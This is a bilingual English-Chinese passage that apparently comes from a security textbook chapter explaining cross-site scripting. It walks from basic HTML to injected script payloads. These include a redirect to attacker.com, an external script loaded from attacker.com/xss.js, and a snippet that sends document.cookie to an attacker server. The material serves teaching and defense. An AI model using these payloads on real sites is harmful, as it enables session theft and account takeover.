Question

In an XSS attack, the attacker injects an executable script into HTML pages viewed by the user. This means that to understand XSS, you’ll have to first understand JavaScript and HTML syntax.

在 XSS 攻击中，攻击者向用户查看的 HTML 页面注入可执行脚本。这意味着要了解 XSS，您必须首先了解 JavaScript 和 HTML 语法。

Web pages are made up of HTML code whose elements describe the page’s structure and contents. For example, an <h1> tag defines a web page’s header, and a <p> tag represents a paragraph of text. The tags use corresponding closing tags, like </h1> and </p> , to indicate where the contents of the element should end. To see how this works, save this code in a file named test.html :

网页由 HTML 代码构成，其元素描述页面的结构和内容。例如，<h1> 标签定义网页标题，<p> 标签表示文本段落。标签使用相应的闭合标签，如 </h1> 和 </p>，来指示元素的内容应该在哪里结束。为了看到这个工作原理，请将此代码保存在名为 test.html 的文件中：

<html>
  <h1>Welcome to my web page.</h1>
  <p>Thanks for visiting!</p>
</html>

Now open it with your web browser. You can do this by right-clicking the HTML file, clicking Open With , and then selecting your preferred web browser, like Google Chrome, Mozilla Firefox, or Microsoft Internet Explorer. Or you can simply open your web browser and drag the HTML file into the browser window. You should see a simple web page like Figure 6-1 .

现在用您的浏览器打开它。您可以右键点击 HTML 文件，选择"使用...打开"，然后选择您喜欢的浏览器，如 Google Chrome，Mozilla Firefox 或 Microsoft Internet Explorer。或者您可以直接打开浏览器并将 HTML 文件拖到浏览器窗口中。您应该会看到一个简单的网页，就像图 6-1 一样。

Figure 6-1 : Our simple HTML page rendered in a browser

图 6-1：我们的简单 HTML 网页在浏览器上呈现。

In addition to formatting text, HTML lets you embed images with <img> tags, create user-input forms with <form> tags, link to external pages with <a> tags, and perform many other tasks. A full tutorial on how to write HTML code is beyond the scope of this chapter, but you can use W3School’s tutorial ( https://www.w3schools.com/html/default.asp ) as a resource.

除了格式化文本外，HTML 还允许您使用 <img> 标签嵌入图像，使用 <form> 标签创建用户输入表单，使用 <a> 标签链接到外部页面以及执行许多其他任务。如何编写 HTML 代码的完整教程超出了本章的范围，但您可以使用 W3School 的教程（https://www.w3schools.com/html/default.asp）作为资源。

HTML also allows the inclusion of executable scripts within HTML documents using <script> tags. Websites use these scripts to control client-side application logic and make the website interactive. For example, the following script generates a Hello! pop-up on the web page:

HTML 还允许使用<script>标签在 HTML 文档中包含可执行脚本。网站使用这些脚本来控制客户端应用程序逻辑并使网站变得交互式。例如，以下脚本会在网页上生成 Hello!弹窗：

<html>
  <script>alert("Hello!");</script>
  <h1>Welcome to my web page!</h1>
  <p>Thanks for visiting!</p>
</html>

Scripts like this one that are embedded within an HTML file instead of loaded from a separate file are called inline scripts . These scripts are the cause of many XSS vulnerabilities. (Besides embedding a script inside the HTML page as an inline script, sites can also load JavaScript code as an external file, like this: <script src=" URL_OF_EXTERNAL_SCRIPT "></script> .)

像这种嵌入在 HTML 文件中而不是从单独的文件加载的脚本被称为内联脚本。这些脚本是许多 XSS 漏洞的根本原因。（除了将脚本嵌入 HTML 页作为内联脚本之外，网站还可以像这样加载 JavaScript 代码作为外部文件：<script src="URL_OF_EXTERNAL_SCRIPT"></script>。） 内联脚本是 XSS 漏洞的一个主要因素。

To see why, let’s say that our site contains an HTML form that allows visitors to subscribe to a newsletter ( Figure 6-2 ).

让我们看看为什么，假设我们的网站包含一个 HTML 表单，让访客可以订阅新闻简报（图 6-2）。

Figure 6-2 : Our HTML page with an HTML form

图 6-2：我们的 HTML 页面带有 HTML 表单。

The source HTML code of the page looks like this:

该页面的源 HTML 代码如下：

<h1>Welcome to my site.</h1>
<h3>This is a cybersecurity newsletter that focuses on bug bounty
news and write-ups. Please subscribe to my newsletter below to
receive new cybersecurity articles in your email inbox.</h3>
<form action="/subscribe" method="post">
  <label for="email">Email:</label><br>
  <input type="text" id="email" value="Please enter your email.">
  <br><br>
  <input type="submit" value="Submit">
</form>

After a visitor inputs an email address, the website confirms it by displaying it on the screen ( Figure 6-3 ).

在访客输入电子邮件地址后，网站将通过在屏幕上显示来确认它（图 6-3）。

Figure 6-3 : The confirmation message after a visitor subscribes to our newsletter

图 6-3: 访客订阅我们的新闻通讯后的确认信息。

The HTML that generates the confirmation message looks like this; HTML <b> tags indicate boldface text:

生成确认消息的 HTML 代码如下； HTML<b>标签表示加粗文本：

<p>Thanks! You have subscribed <b>vickie@gmail.com</b> to the newsletter.</p>

The page constructs the message by using user input. Now, what if a user decides to input a script instead of an email address in the email form? For instance, a script that sets the location of a web page will make the browser redirect to the location specified:

如果用户在电子邮件表单中输入脚本而不是电子邮件地址，页面将使用用户输入构建消息。例如，设置网页位置的脚本将使浏览器重定向到指定位置。

<script>location="http://attacker.com";</script>

The attacker could enter this script into the email form field and click Submit ( Figure 6-4 ).

攻击者可以将此脚本输入到电子邮件表单字段中并单击提交（图 6-4）。

Figure 6-4 : An attacker can enter a script instead of an email in the input field.

图 6-4：攻击者可以在输入框中输入脚本代替电子邮件。

If the website doesn’t validate or sanitize the user input before constructing the confirmation message, the page source code would become the following:

如果网站在构建确认消息之前不验证或清理用户输入，则页面源代码将变为以下内容：

<p>Thanks! You have subscribed <b>    <script>location="http://attacker.com";</script> </b> to the newsletter.</p>

Validating user input means that the application checks that the user input meets a certain standard—in this case, does not contain malicious JavaScript code. Sanitizing user input, on the other hand, means that the application modifies special characters in the input that can be used to interfere with HTML logic before further processing.

验证用户输入意味着应用程序检查用户输入是否符合某种标准——在这种情况下，是否不包含恶意 JavaScript 代码。另一方面，消毒用户输入意味着应用程序修改输入中的特殊字符，这些字符可以在进一步处理之前干扰 HTML 逻辑。

As a result, the inline script would cause the page to redirect to attacker.com . XSS happens when attackers can inject scripts in this manner onto a page that another user is viewing. The attacker can also use a different syntax to embed malicious code. The src attribute of the HTML <script> tag allows you to load JavaScript from an external source. This piece of malicious code will execute the contents of http://attacker.com/xss.js/ on the victim’s browser during an XSS attack:

因此，内联脚本会导致页面重定向到 attacker.com。 XSS 发生在攻击者能够以这种方式注入脚本到另一个用户正在查看的页面上。 攻击者也可以使用不同的语法来嵌入恶意代码。 HTML <script> 标签的 src 属性允许您从外部资源加载 JavaScript。 在 XSS 攻击期间，这段恶意代码将执行 http://attacker.com/xss.js/的内容在受害者的浏览器上执行。

<script src=http://attacker.com/xss.js></script>

This example isn’t really exploitable, because attackers have no way of injecting the malicious script on other users’ pages. The most they could do is redirect themselves to the malicious page. But let’s say that the site also allows users to subscribe to the newsletter by visiting the URL https://subscribe.example.com?email=SUBSCRIBER_EMAIL . After users visit the URL, they will be automatically subscribed, and the same confirmation will be shown on the web page. In this case, attackers can inject the script by tricking users into visiting a malicious URL:

这个例子并不是真正的可利用，因为攻击者没有办法在其他用户的页面上注入恶意脚本。他们最多只能将自己重定向到恶意页面。但假设该网站还允许用户通过访问 URL https://subscribe.example.com?email=SUBSCRIBER_EMAIL 来订阅通讯。用户访问该 URL 后，将会自动订阅，并在网页上显示相同的确认信息。这种情况下，攻击者可以通过欺骗用户访问恶意 URL 来注入脚本。

https://subscribe.example.com?email=<script>location="http://attacker.com";</script>

Since the malicious script gets incorporated into the page, the victim’s browser will think the script is part of that site. Then the injected script can access any resources that the browser stores for that site, including cookies and session tokens. Attackers can, therefore, use these scripts to steal information and bypass access control. For example, attackers might steal user cookies by making the victim’s browser send a request to the attacker’s IP with the victim’s cookie as a URL parameter:

由于恶意脚本被嵌入页面中，受害者浏览器将认为该脚本是该网站的一部分。然后，注入的脚本可以访问浏览器为该网站存储的任何资源，包括 Cookie 和会话令牌。攻击者因此可以使用这些脚本窃取信息并绕过访问控制。例如，攻击者可能通过使受害者浏览器发送带有受害者 Cookie 作为 URL 参数的请求来窃取用户 Cookie。

<script>image = new Image();
image.src='http://attacker_server_ip/?c='+document.cookie;</script>

This script contains JavaScript code to load an image from the attacker’s server, with the user’s cookies as part of the request. The browser will send a GET request to the attacker’s IP, with the URL parameter c (for cookie ) containing the user’s document.cookie , which is the victim user’s cookie on the current site. In this way, attackers can use the XSS to steal other users’ cookies by inspecting incoming requests on their server logs. Note that if the session cookie has the HttpOnly flag set, JavaScript will not be able to read the cookie, and therefore the attacker will not be able to exfiltrate it. Nevertheless, XSS can be used to execute actions on the victim’s behalf, modify the web page the victim is viewing, and read the victim’s sensitive information, such as CSRF tokens, credit card numbers, and any other details rendered on their page.

这个脚本包含了 JavaScript 代码，用于从攻击者的服务器上载入一个图片，并将用户的 cookies 作为请求的一部分。浏览器将发送一个 GET 请求到攻击者的 IP 地址，并带有 URL 参数 c（用于 cookie），其中包含用户的 document.cookie，也就是当前网站受害用户的 cookie。通过这种方式，攻击者可以使用 XSS 窃取其他用户的 cookie，通过检查其服务器日志中的传入请求。请注意，如果会话 cookie 设置了 HttpOnly 标志，则 JavaScript 将无法读取 cookie，因此攻击者将无法窍取它。尽管如此，XSS 仍可用于代表受害者执行操作，修改受害者正在查看的网页，并读取受害者的敏感信息，例如 CSRF 令牌、信用卡号码和在其页面上呈现的任何其他详细信息。